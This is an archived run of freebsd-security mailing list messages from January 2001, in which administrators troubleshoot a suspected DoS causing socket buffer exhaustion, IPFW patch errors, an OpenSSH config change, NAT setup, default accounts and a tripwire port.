NASA Research & Education Network (650) 604-4550 (voice) Ames Research Center Mail Stop 233-21 (650) 604-3080 (fax) Moffett Field, CA 94035-1000 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 11:31:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.sonet.pt (mail.sonet.pt [195.8.11.18]) by hub.freebsd.org (Postfix) with SMTP id 80C4837B404 for ; Wed, 24 Jan 2001 11:30:50 -0800 (PST) Received: (qmail 14611 invoked from network); 24 Jan 2001 19:29:09 -0000 Received: from unknown (HELO angelsp) (195.8.11.26) by 195.8.11.18 with SMTP; 24 Jan 2001 19:29:09 -0000 Message-ID: <030c01c0863c$0ae82680$1a0b08c3@sonet.pt> From: "Jorge Filipe Andrade" To: , References: <01012417332701.31962@localhost.localdomain> Subject: Re: socket: No buffer space available Date: Wed, 24 Jan 2001 19:30:00 -0000 Organization: =?Windows-1252?Q?SONET_-_Servi=E7os_Internet=2C_Lda?= MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I have too this problem, but is in Squid Proxy Server... In cache.log and in Microsoft Internet Explorer 5: 2001/01/24 19:04:24| comm_open: socket failure: (55) No buffer space available 2001/01/24 19:04:24| comm_open: socket failure: (55) No buffer space available ... and the squid proxy server not working correctly. I running the squid proxy server in Dual PIII 500 Mhz with 384 RAM, FreeBSD 4.1.1-RELEASE and two network board, I have too installed a Cidera Inc. Cache (SkyCache). Any questions? -- Best Regards, Jorge Filipe Andrade SONET - Serviços Internet, Lda http://www.sonet.pt ----- Original Message ----- From: "Mr. Blackman" To: Sent: Wednesday, January 24, 2001 2:32 PM Subject: DoS: socket: No buffer space available > > Hello! > > Last days our server was DoSed (I'm sure). > Ok, facts: > The Problem: > IP socket: No buffer space available > UNIX Socket : No buffer space available > > Victim: FreeBSD 3.4 > Kernel compiled with these options: > options ICMP_BANDLIM > options TCP_DROP_SYNFIN > options TCP_RESTRICT_RST > options IPFIREWALL > options IPFIREWALL_VERBOSE > options IPFIREWALL_VERBOSE_LIMIT=10 > > /etc/rc.conf: > tcp_drop_synfin="YES" > tcp_restrict_rst="YES" > icmp_drop_redirect="YES" > icmp_log_redirect="YES" > firewall_enable="YES" > firewall_script="/etc/rc.firewall" > firewall_type="/etc/rc.firewall" > firewall_quiet="NO" > > ### TCP STACK TUNING ### > # TCP send/receive spaces > sysctl -w net.inet.tcp.sendspace=32768 > sysctl -w net.inet.tcp.recvspace=32768 > # Socket queue defense against SYN attacks > sysctl -w kern.ipc.somaxconn=1024 #!!! > sysctl -w net.inet.icmp.drop_redirect=1 > sysctl -w net.inet.icmp.log_redirect=1 > sysctl -w net.inet.ip.redirect=0 > sysctl -w net.inet6.ip6.redirect=0 > sysctl -w net.link.ether.inet.max_age=1200 > sysctl -w net.inet.ip.sourceroute=0 > sysctl -w net.inet.ip.accept_sourceroute=0 > sysctl -w net.inet.icmp.bmcastecho=0 > sysctl -w net.inet.icmp.maskrepl=0 > ### END TCP STACK TUNING ### > > On this server all packets are filtered with IPFW and _all_, except 53 udp are > in "deny". > > Yes, I know about "named DoS", but the server is completely down. > And only reboot solve the problem. > > Where is the problem, where is salvation?:) > > Thank you for attention. > > Mr. Blackman, Security Officer. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 11:47:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail2.netcologne.de (mail2.netcologne.de [194.8.194.103]) by hub.freebsd.org (Postfix) with ESMTP id 934DB37B404 for ; Wed, 24 Jan 2001 11:47:23 -0800 (PST) Received: from husten.security.at12.de (dial-195-14-244-37.netcologne.de [195.14.244.37]) by mail2.netcologne.de (8.9.3/8.9.3) with ESMTP id UAA18056 for ; Wed, 24 Jan 2001 20:47:21 +0100 (MET) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by husten.security.at12.de (8.11.1/8.11.1) with ESMTP id f0OJl8213729 for ; Wed, 24 Jan 2001 20:47:08 +0100 (CET) (envelope-from pherman@frenchfries.net) Date: Wed, 24 Jan 2001 20:47:07 +0100 (CET) From: Paul Herman To: Subject: tripwire-2.3 for FreeBSD! Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, FYI, I've put together a patch against the (linux-centric) tripwire-2.3.0-src, so it can be compiled under FreeBSD. The source ain't pretty, and it's far from being /usr/port or "./configure" friendly, I suppose, but at least it works. You just need gmake, and have to edit src/Makefile. I also fixed some -Wall messages, and needed to update STLport because of small -pthread problems, but seems to work fine now with the patch. I've tried contacting the guys at tripwire.org about this last weekend, but all mails bounce with a "554 Message looping (received 6 times)" error from relay.tripwire.com. :-P Anyway, here's the patch (412K): Patch: http://www.frenchfries.net/paul/freebsd/tw.patch.gz Original Tripwire source: http://download.sourceforge.net/tripwire/tripwire-2.3.0-src.tar.gz -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 12:25:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id C5CC337B401 for ; Wed, 24 Jan 2001 12:25:30 -0800 (PST) Received: (qmail 23627 invoked by uid 0); 24 Jan 2001 20:25:26 -0000 Received: from p3ee2162c.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.44) by mail.gmx.net (mp009-rz3) with SMTP; 24 Jan 2001 20:25:26 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id SAA30896 for freebsd-security@freebsd.org; Wed, 24 Jan 2001 18:35:23 +0100 Date: Wed, 24 Jan 2001 18:35:23 +0100 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: IPNAT Message-ID: <20010124183523.J253@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <3A6EE52B.B37F65EB@incorp.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <3A6EE52B.B37F65EB@incorp.dk>; from dr@incorp.dk on Wed, Jan 24, 2001 at 02:22:35PM +0000 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 24, 2001 at 14:22 +0000, Dennis Rand wrote: > > I'm trying to setup a network with internal ip's like > 192.168.0.* but i have this problem that i also have 2 > webserveres running on the inside with to external IP attached > to it then it would be great if i could get them translated > from internal IP's to External IP's and the other way around so > if someone wanted to contact the webserveres the FreeBSD > machine would translate the external IP to the specific > internal machine. Do something like man -k ipnat man 5 ipnat or even better: man -a ipnat $PAGER /usr/src/contrib/ipfilter/rules/* I guess the "bimap" keyword is what you're looking for. Otherwise it might be the "redir" keyword. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 12:42:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 41DD137B400 for ; Wed, 24 Jan 2001 12:42:06 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id DFC381A01; Wed, 24 Jan 2001 15:42:04 -0500 (EST) Date: Wed, 24 Jan 2001 15:42:04 -0500 From: Will Andrews To: Paul Herman Cc: freebsd-security@FreeBSD.ORG Subject: Re: tripwire-2.3 for FreeBSD! Message-ID: <20010124154204.L998@puck.firepipe.net> Reply-To: Will Andrews References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7vAdt9JsdkkzRPKN" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from pherman@frenchfries.net on Wed, Jan 24, 2001 at 08:47:07PM +0100 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --7vAdt9JsdkkzRPKN Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 24, 2001 at 08:47:07PM +0100, Paul Herman wrote: > FYI, I've put together a patch against the (linux-centric) > tripwire-2.3.0-src, so it can be compiled under FreeBSD. The source > ain't pretty, and it's far from being /usr/port or "./configure" > friendly, I suppose, but at least it works. You just need gmake, and > have to edit src/Makefile. So, are you going to submit this in ports form? :-) --=20 wca --7vAdt9JsdkkzRPKN Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6bz4cF47idPgWcsURAkX4AJ9FrQSKM2pEI6rV8IQff6uemA58rQCdHGJo Q8BY5UxI9WwAPVcwRGxO8yY= =rxqj -----END PGP SIGNATURE----- --7vAdt9JsdkkzRPKN-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 13:25:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.interactivate.com (unknown [63.141.73.15]) by hub.freebsd.org (Postfix) with ESMTP id 6128037B400; Wed, 24 Jan 2001 13:25:11 -0800 (PST) Received: from interactivate.com ([63.141.73.10]) by mail.interactivate.com (8.11.1/8.11.1) with ESMTP id f0OLl0V70626; Wed, 24 Jan 2001 13:47:00 -0800 (PST) (envelope-from larry@interactivate.com) Message-ID: <3A6F4689.A3E65177@interactivate.com> Date: Wed, 24 Jan 2001 13:18:01 -0800 From: Lawrence Sica Organization: Interactivate, Inc X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Matt Chew Spence Cc: Guillermo Leandro , freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Subject: Re: Default users and the passwords References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Chew Spence wrote: > > Another question in a similar vein: > > Which, if any (besides root and nobody, which are a given), of these > default accounts are critical to the basic functionality of the box? Is > there a list somewhere where I can match these phantom/daemon users to > their functionality/dependencies? I'd just as soon blow away things I'll > never use, (uucp, xten, etc), but I am loathe to do so without a better > understanding of the ramifications thereof.... > The big issue if it can break make worlds. Make world expects cerain users and groups. If your not running hte services, star out the passwords and make sure they have a nologin shell. That probably the safest bet. --Larry -- Lawrence Sica ------------------------------------------- larry@interactivate.com systems Administrator - Interactivate, Inc. http://www.interactivate.com ------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 15:15:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from merton.slipstreams.net (owirc.com [208.45.226.107]) by hub.freebsd.org (Postfix) with ESMTP id 9F90737B401 for ; Wed, 24 Jan 2001 15:15:19 -0800 (PST) Received: from cc481952a (arcane.slipstreams.net [192.168.1.1]) by merton.slipstreams.net (8.11.1/8.11.1) with SMTP id f0OFM7X00422 for ; Wed, 24 Jan 2001 15:22:08 GMT (envelope-from kupek@earthlink.net) From: "Scott Hilton" To: Subject: Problems with IPFW patch Date: Wed, 24 Jan 2001 15:14:45 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings, I'm running FreeBSD 4.2 and having some problems after applying the latest IPFW patch. I'm getting the following errors when restarting FreeBSD: ip_fw_ctl: empty interface name ipfw: getsockopt(IP_FW_ADD): Invalid argument ip_fw_ctl: dst range set but n_dst_p=0 These three messages repeat multiple times. My rc.firewall hasn't changed since before I installed the ipfw patch, and the interface its trying to use (rl0) is a valid interface. Anyone know whats up? I tried cvsupping and build/install world, but nothing changed.. Scott To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 15:43:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id A4EB937B401 for ; Wed, 24 Jan 2001 15:43:40 -0800 (PST) Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with SMTP id com for ; Wed, 24 Jan 2001 15:43:29 -0800 Reply-To: From: "Scott Raymond" To: Subject: RE: Problems with IPFW patch Date: Wed, 24 Jan 2001 15:43:28 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You must have done what I did - make world with a recent cvsup source tree update. You need to recompile and install the new kernel as well. My own problem is with OpenSSH. The default one from the core system compile of make world no longer works. I had to disable it and use the ports tree version from /usr/ports/security/openssh. -- Scott ======================= Scott Raymond http://soundamerica.com ======================= > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Scott Hilton > Sent: Wednesday, January 24, 2001 3:15 PM > To: freebsd-security@freebsd.org > Subject: Problems with IPFW patch > > > Greetings, > > I'm running FreeBSD 4.2 and having some problems after > applying the latest > IPFW patch. I'm getting the following errors when restarting FreeBSD: > > > ip_fw_ctl: empty interface name > ipfw: getsockopt(IP_FW_ADD): Invalid argument > ip_fw_ctl: dst range set but n_dst_p=0 > > > These three messages repeat multiple times. My rc.firewall > hasn't changed > since before I installed the ipfw patch, and the interface > its trying to use > (rl0) is a valid interface. Anyone know whats up? I tried > cvsupping and > build/install world, but nothing changed.. > > > Scott > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 16:29:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from merton.slipstreams.net (owirc.com [208.45.226.107]) by hub.freebsd.org (Postfix) with ESMTP id DAB6E37B402 for ; Wed, 24 Jan 2001 16:29:19 -0800 (PST) Received: from cc481952a (arcane.slipstreams.net [192.168.1.1]) by merton.slipstreams.net (8.11.1/8.11.1) with SMTP id f0OGa9611497; Wed, 24 Jan 2001 16:36:15 GMT (envelope-from kupek@earthlink.net) From: "Scott Hilton" To: , Subject: FW: Problems with IPFW patch Date: Wed, 24 Jan 2001 16:28:46 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yup, rebuilding the kernel did fix the problem, so that was it. Just wanted to forward this message to the list in case anyone else has this problem after installing the ipfw patch. Thanks for the assistance.. Scott -----Original Message----- From: Scott Hilton [mailto:kupek@earthlink.net] Sent: Wednesday, January 24, 2001 3:51 PM To: scott@link-net.com Subject: RE: Problems with IPFW patch I had rebuilt my kernel after upgrading to 4.2, and the error messages I was getting were occuring before I ever did a makeworld, so I'm not sure if that is it or not. However, I am in the middle of a build/installkernel now, so we'll see if that takes care of the problem.. Scott -----Original Message----- You must have done what I did - make world with a recent cvsup source tree update. You need to recompile and install the new kernel as well. My own problem is with OpenSSH. The default one from the core system compile of make world no longer works. I had to disable it and use the ports tree version from /usr/ports/security/openssh. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 16:56: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id 4F51B37B400 for ; Wed, 24 Jan 2001 16:55:39 -0800 (PST) Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with SMTP id com for ; Wed, 24 Jan 2001 16:55:38 -0800 Reply-To: From: "Scott Raymond" To: Subject: OpenSSH b0rked (was RE: Problems with IPFW patch) Date: Wed, 24 Jan 2001 16:55:38 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yeah, now if I could just figure out what was wrong with the openssh implementation in the core system. Openssh (ports tree version) has an annoying install sequence - you can't define where it gets installed, so the files get installed to the hard-coded directory tree /usr/local. The non-working core system one normally installs sshd to /usr/sbin and the config files to /etc/ssh. What bugs me is that when this gets fixed it's going to take another 4 hours of compiling and installing. Bah. -- Scott ======================= Scott Raymond http://soundamerica.com ======================= > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Scott Hilton > Sent: Wednesday, January 24, 2001 4:29 PM > To: scott@link-net.com; freebsd-security@freebsd.org > Subject: FW: Problems with IPFW patch > > > Yup, rebuilding the kernel did fix the problem, so that was > it. Just wanted > to forward this message to the list in case anyone else has > this problem > after installing the ipfw patch. Thanks for the assistance.. > > Scott > > > -----Original Message----- > From: Scott Hilton [mailto:kupek@earthlink.net] > Sent: Wednesday, January 24, 2001 3:51 PM > To: scott@link-net.com > Subject: RE: Problems with IPFW patch > > > I had rebuilt my kernel after upgrading to 4.2, and the error > messages I was > getting were occuring before I ever did a makeworld, so I'm > not sure if that > is it or not. However, I am in the middle of a > build/installkernel now, so > we'll see if that takes care of the problem.. > > Scott > > > -----Original Message----- > > You must have done what I did - make world with a recent cvsup source > tree update. You need to recompile and install the new > kernel as well. > > My own problem is with OpenSSH. The default one from the core system > compile of make world no longer works. I had to disable it > and use the > ports tree version from /usr/ports/security/openssh. > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 18:31:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id C786937B404 for ; Wed, 24 Jan 2001 18:31:32 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0P2Yvu45334; Wed, 24 Jan 2001 18:34:57 -0800 (PST) (envelope-from kris) Date: Wed, 24 Jan 2001 18:34:57 -0800 From: Kris Kennaway To: Scott Raymond Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010124183457.B45221@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="rJwd6BRFiFCcLxzm" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from scott@link-net.com on Wed, Jan 24, 2001 at 04:55:38PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --rJwd6BRFiFCcLxzm Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 24, 2001 at 04:55:38PM -0800, Scott Raymond wrote: > Yeah, now if I could just figure out what was wrong with the openssh > implementation in the core system. Openssh (ports tree version) has an > annoying install sequence - you can't define where it gets installed, so > the files get installed to the hard-coded directory tree /usr/local. > The non-working core system one normally installs sshd to /usr/sbin and > the config files to /etc/ssh. Perhaps if you posted an actual error..? :) Dusting off my magic crystal ball, I predict you aren't using the official upgrade procedure which involves running mergemaster (and haven't read the reminder notice in /usr/src/UPDATING), and have an out of date /etc/pam.conf. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --rJwd6BRFiFCcLxzm Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6b5DRWry0BWjoQKURAmELAKCQ9l+3jbca/HMkWl9QhPfapRQfOQCdEypT 3nY376ahAF1XM2SmkIySzGE= =8e24 -----END PGP SIGNATURE----- --rJwd6BRFiFCcLxzm-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 18:33: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id EABCA37B69C for ; Wed, 24 Jan 2001 18:32:43 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0P2a8K45359; Wed, 24 Jan 2001 18:36:08 -0800 (PST) (envelope-from kris) Date: Wed, 24 Jan 2001 18:36:08 -0800 From: Kris Kennaway To: Scott Raymond Cc: freebsd-security@FreeBSD.ORG Subject: Re: Problems with IPFW patch Message-ID: <20010124183608.C45221@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jousvV0MzM2p6OtC" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from scott@link-net.com on Wed, Jan 24, 2001 at 03:43:28PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --jousvV0MzM2p6OtC Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Jan 24, 2001 at 03:43:28PM -0800, Scott Raymond wrote: > You must have done what I did - make world with a recent cvsup source > tree update. You need to recompile and install the new kernel as well. Do you mean that you tried just recompiling and reloading the module as described in the advisory, and it didn't work, or that you didn't touch the kernel at all, only rebuild ipfw(8)? Kris -- NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --jousvV0MzM2p6OtC Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6b5EXWry0BWjoQKURAl0OAJ0UcHu266fhhStTEow/ognOITaF5wCggU86 22jrBSgFgDK7wW3AFcR8hnk= =Xl8j -----END PGP SIGNATURE----- --jousvV0MzM2p6OtC-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 18:36:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from merton.slipstreams.net (owirc.com [208.45.226.107]) by hub.freebsd.org (Postfix) with ESMTP id 041D137B699 for ; Wed, 24 Jan 2001 18:36:40 -0800 (PST) Received: from cc481952a (arcane.slipstreams.net [192.168.1.1]) by merton.slipstreams.net (8.11.1/8.11.1) with SMTP id f0OIhaq01401; Wed, 24 Jan 2001 18:43:37 GMT (envelope-from kupek@earthlink.net) From: "Scott Hilton" To: , Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) Date: Wed, 24 Jan 2001 18:36:14 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What's wrong with OpenSSH? The only problem I encountered with it was the following message when trying to start it: fatal: ConnectionsPerPeriod has been deprecated I was looking around for a few minutes, and found the following: ================================================================= = Changes from previous versions = ================================================================= 2.3.0: We link with OpenSSL 0.9.6 now. Diffs from the FreeBSD version are not distributed right now (but will be). ConnectionsPerPeriod is currently not integrated. Consider using MaxStartups instead. If you still need ConnectionsPerPeriod, bug me and I may do it. I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config and sshd loaded without any problems. -----Original Message----- Yeah, now if I could just figure out what was wrong with the openssh implementation in the core system. Openssh (ports tree version) has an annoying install sequence - you can't define where it gets installed, so the files get installed to the hard-coded directory tree /usr/local. The non-working core system one normally installs sshd to /usr/sbin and the config files to /etc/ssh. What bugs me is that when this gets fixed it's going to take another 4 hours of compiling and installing. Bah. -- Scott To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 19: 2:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id 5C42F37B69B for ; Wed, 24 Jan 2001 19:02:11 -0800 (PST) Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with SMTP id com for ; Wed, 24 Jan 2001 19:02:10 -0800 Reply-To: From: "Scott Raymond" To: Subject: RE: Problems with IPFW patch Date: Wed, 24 Jan 2001 19:02:10 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010124183608.C45221@citusc17.usc.edu> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Not at all. I had planned on recompiling the kernel. I have kern.securelevel set to 2, so I need to reboot to single user mode in order to do the make isntallworld. So I saw the same ipfw errors he did when I rebooted. After the kernel recompile was done, the errors went away. I did the cvsup update because I saw the update posted to the list. I also recalled that firewalling support is in the kernel itself, so the make world had to be accompanied by a kernel recompile. -- Scott ======================= Scott Raymond http://soundamerica.com ======================= > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway > Sent: Wednesday, January 24, 2001 6:36 PM > To: Scott Raymond > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Problems with IPFW patch > > > On Wed, Jan 24, 2001 at 03:43:28PM -0800, Scott Raymond wrote: > > You must have done what I did - make world with a recent > cvsup source > > tree update. You need to recompile and install the new > kernel as well. > > Do you mean that you tried just recompiling and reloading the module > as described in the advisory, and it didn't work, or that you didn't > touch the kernel at all, only rebuild ipfw(8)? > > Kris > > -- > NOTE: To fetch an updated copy of my GPG key which has not expired, > finger kris@FreeBSD.org > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 19: 9:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id A7BA237B400 for ; Wed, 24 Jan 2001 19:09:33 -0800 (PST) Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with SMTP id com; Wed, 24 Jan 2001 19:09:32 -0800 Reply-To: From: "Scott Raymond" To: "Scott Hilton" , Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch) Date: Wed, 24 Jan 2001 19:09:32 -0800 Keywords: FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) 